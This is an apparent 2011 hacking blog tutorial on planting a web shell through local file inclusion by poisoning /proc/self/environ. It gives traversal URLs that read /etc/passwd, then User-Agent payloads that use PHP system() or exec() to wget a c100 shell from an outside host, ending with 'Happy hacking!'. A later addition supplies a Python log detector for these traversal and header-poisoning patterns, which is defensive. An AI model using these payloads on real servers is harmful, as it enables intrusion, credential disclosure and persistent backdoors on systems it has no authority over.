
Monday, July 18, 2011

tutorial lfi

How to plant a shell through LFI (Local File Inclusion) using the /proc/self/environ method
 
Writer: gunslinger_
 
In this tutorial I will explain how to plant a shell on the target server through LFI using the /proc/self/environ method. Let's begin.
 
1. Find a website that is vulnerable to LFI.
 
example: http://site.com/info.php?file=news.php
 
2. Replace "news.php" with "../../../".
 
example: http://site.com/info.php?file=../../../
 
We then get an error like the following:
 
Warning: include(../../../) [function.include]: failed to open stream: No such file or directory in /home/Gunslinger/public_html/info.php on line 99
 
The error shows that include() follows our input, so we have a chance to include a different file. Next we try to reach /etc/passwd.
 
example: http://site.com/info.php?file=etc/passwd
 
But we still get an error like the following:
 
Warning: include(/etc/passwd) [function.include]: failed to open stream: No such file or directory in /home/Gunslinger/public_html/info.php on line 99
 
What if we go further up the directory tree? Let's try:
 
example: http://site.com/info.php?file=../../../../../../../../../etc/passwd
 
Ahoy, we managed to read /etc/passwd, which looks like this:
 
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
hplip:x:103:7:HPLIP system user,,,:/var/run/hplip:/bin/false
avahi-autoipd:x:104:110:Avahi daemon AutoIP,,,:/var/lib/avahi-autoipd:/bin/false
gdm:x:105:111:Gnome Display Manager:/var/lib/gdm:/bin/false
saned:x:106:113::/home/saned:/bin/false
pulse:x:107:114:PulseAudio daemon,,,:/var/run/pulse:/bin/false
messagebus:x:108:117::/var/run/dbus:/bin/false
polkituser:x:109:118:PolicyKit,,,:/var/run/PolicyKit:/bin/false
avahi:x:110:119:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
haldaemon:x:111:120:Hardware abstraction layer,,,:/var/run/hald:/bin/false
Gunslinger:x:1000:1000:gunslinger_,,,:/home/Gunslinger:/bin/bash
snmp:x:112:65534::/var/lib/snmp:/bin/false
guest:x:113:124:Guest,,,:/tmp/guest-home.rRZGXM:/bin/bash
sshd:x:114:65534::/var/run/sshd:/usr/sbin/nologin
 
3. Check whether /proc/self/environ can be accessed. Replace "/etc/passwd" with "/proc/self/environ":
 
example: http://site.com/info.php?file=../../../../../../../../../proc/self/environ
 
If you get something like this:
 
DOCUMENT_ROOT=/home/Gunslinger/public_html
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=text/html,application/xml;q=0.9,application/xhtml+xml,image/png,image/jpeg,image/gif,image/x-xbitmap,*/*;q=0.1
HTTP_COOKIE=PHPSESSID=3g4t67261b341231b94r1844ac2ad7ac
HTTP_HOST=www.site.com
HTTP_REFERER=http://www.site.com/index.php?view=../../../../../../etc/passwd
HTTP_USER_AGENT=Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102815 Ubuntu/9.04 (jaunty) Firefox/3.0.15
PATH=/bin:/usr/bin
QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
REDIRECT_STATUS=200
REMOTE_ADDR=6x.1xx.4x.1xx
REMOTE_PORT=35665
REQUEST_METHOD=GET
REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
SCRIPT_FILENAME=/home/Gunslinger/public_html/index.php
SCRIPT_NAME=/index.php
SERVER_ADDR=1xx.1xx.1xx.6x
SERVER_ADMIN=gunslinger@site.com
SERVER_NAME=www.site.com
SERVER_PORT=80
SERVER_PROTOCOL=HTTP/1.0
SERVER_SIGNATURE=Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 OpenSSL/0.9.8k Server at www.site.com Port 80
 
Apparently /proc/self/environ can be accessed! If you get a blank page instead, /proc/self/environ cannot be accessed, or the operating system may be *BSD.
 
4. Now we inject the malicious code by poisoning an HTTP header. How do we inject it? We can use the Tamper Data add-on for Firefox, which you can download here: https://addons.mozilla.org/en-US/firefox/addon/966. Open Tamper Data in Firefox, request the /proc/self/environ URL from before ("http://site.com/info.php?file=../../../../../../../../../proc/self/environ"), and fill the User-Agent header with the following code:
 
<?system('wget -O http://r57.gen.tr/c100.txt shell.php');?>
 
or
 
<?exec('wget -O http://r57.gen.tr/c100.txt shell.php');?>
 
Then submit the request.
 
5. If the code above was injected successfully, the shell will be at a location like this:
 
http://www.site.com/shell.php
 
Happy hacking!
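As an added example that is not part of the original post, here is a small Python detector a defender could run over Apache access-log lines to flag the pattern this tutorial relies on: directory traversal toward /etc/passwd or /proc/self/environ, and PHP tags in a User-Agent or Referer header, which is the signature of environ poisoning. The log lines are constructed for the example, and the combined-log regex and the list of sensitive paths are assumptions.

```python
import re
from urllib.parse import unquote

# Constructed sample Apache combined-log lines (not from the original post).
# The first two mirror the requests in the tutorial; the third is benign.
SAMPLE_LOG = """\
10.0.0.5 - - [18/Jul/2011:10:00:01 +0000] "GET /info.php?file=../../../../../../../../../etc/passwd HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.5 - - [18/Jul/2011:10:00:07 +0000] "GET /info.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron HTTP/1.1" 200 1900 "-" "<?php echo 1;?>"
10.0.0.9 - - [18/Jul/2011:10:01:12 +0000] "GET /info.php?file=news.php HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux)"
"""

# Apache "combined" log format: ip ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Files whose disclosure the tutorial walks through (assumed list; extend as needed).
SENSITIVE = ("/etc/passwd", "/proc/self/environ")


def normalize(value: str) -> str:
    """URL-decode twice (catches %252F double encoding), collapse slashes, lowercase."""
    return re.sub(r"/+", "/", unquote(unquote(value))).lower()


def analyze_line(line: str):
    """Return {'ip', 'uri', 'findings'} for a parsable line, or None for garbage."""
    m = LOG_RE.match(line)
    if not m:
        return None
    uri = normalize(m.group("uri"))
    findings = []
    if "../" in uri or "..\\" in uri:
        findings.append("traversal")
    if any(path in uri for path in SENSITIVE):
        findings.append("sensitive-file")
    # PHP open tags in a client-controlled header are the hallmark of
    # /proc/self/environ (and access-log) poisoning through include().
    if "<?" in m.group("ua") or "<?" in m.group("ref"):
        findings.append("php-tag-in-header")
    return {"ip": m.group("ip"), "uri": uri, "findings": findings}


def scan(log: str):
    """Return only the parsed lines that produced at least one finding."""
    return [r for r in map(analyze_line, log.splitlines()) if r and r["findings"]]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["ip"], hit["findings"], hit["uri"])
```

A WAF or log pipeline would typically alert on the combination "sensitive-file" plus "php-tag-in-header" from one client, since that pairing is the step-4 write attempt rather than a mere probe.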